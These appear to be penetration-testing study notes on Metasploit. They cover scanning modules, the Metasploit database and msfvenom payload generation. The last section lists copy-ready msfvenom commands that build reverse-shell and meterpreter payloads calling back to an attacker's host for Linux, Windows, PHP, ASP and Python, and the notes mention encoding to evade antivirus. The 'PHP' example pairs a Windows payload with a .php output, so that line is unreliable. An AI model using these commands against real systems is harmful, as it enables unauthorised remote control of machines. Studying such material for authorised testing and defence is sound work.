Exploitation

Exploitation using Metasploit.

Scanning

Metasploit has many modules for port scanning, these can be listed using search portscan from msfconsole. Port scanning modules usually require some options to be set, such as:

• CONCURRENCY : number of ports to be scanned simultaneously

• PORTS : port range to be scanned, different from nmap, nmap will scan the most used 1000 ports, Metasploit will scan from 1 to 10,000.

• RHOSTS : target to scan

• THREADS : number of threads to be used simultaneously

The /scanner/discovery/udp_sweep module allows quick identification of UDP services, can help quickly identify DNS or NetBIOS.

The smb_enumshares and smb_version modules can be useful in corporate networks.

Metasploit Database

The Metasploit Database can be used to simplify attacking several targets. To initialise this, use systemctl start postgresql followed by msfdb init. To verify this is running, enter msfconsole and then run db_status.

On launch, you will be in the default workspace, this can be verified by typing workspace. A workspace can be added using -a or removed using -d. You can jump between workspaces using workspace [workspace_name].

In a database version of Metasploit, you can use help to list out the Database backend commands. Running db_nmap will save all results to the database. Information on relevant target hosts and services can now be viewed using hosts or services respectively. Using hosts -R will set the host(s) values to RHOSTS by default.

Vulnerability Scanning

Metasploit allows quick identification of critical vulnerabilities which can be considered "low hanging fruit". This is typically any easily exploitable and vulnerable service that would allow a foothold on a server or even high-level privilege access. The better you are at scanning and fingerprinting a service, the easier it will be to identify critical vulnerabilities.

Exploiting

Once you have selected an exploit, you can either use the default payload or select a payload using show payloads then set payload [payload_name | line_number].

Msfvenom

Msfvenom allows you to generate your own payloads, it provides access to all available payloads in Metasploit and allows you to create them in many different formats, for many different systems. Msfvenom can generate a stand-alone payload or a usable raw format payload, you can list supported outputs by using msfvenom --list formats.

Encoders can be applied to try to evade antivirus, in most cases modern obfuscation or injection methods are far more effective. Encoding can be used with the -e option.

Example code to generate a generic php reverse shell would be: msfvenom -p php/reverse_php LHOST=[IP_ADDR] LPORT=[PORT] -f raw > reverse_shell.php. The output will be missing the starting PHP comment tag and the end tag, these should be added to convert it to a working PHP file.

Commonly used examples will follow here, in these examples LHOST will be the attacking IP of your machine and LPORT will be the port the handler listens on:

For Linux:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[IP_ADDR] LPORT=[PORT] -f elf > rev_shell.elf

Note for this one: .elf on Linux is like .exe on Windows, make sure when it is uploaded that it has executable permissions by running chmod +x rev_shell.elf.

For Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP_ADDR] LPORT=[PORT] -f exe > rev_shell.exe

For PHP:

msfvenom -p windows/meterpreter_reverse_tcp LHOST=[IP_ADDR] LPORT=[PORT] -f raw > rev_shell.php

For ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP_ADDR] LPORT=[PORT] -f asp > rev_shell.asp

For Python:

msfvenom -p cmd/unix/reverse_python LHOST=[IP_ADDR] LPORT=[PORT] -f raw > rev_shell.py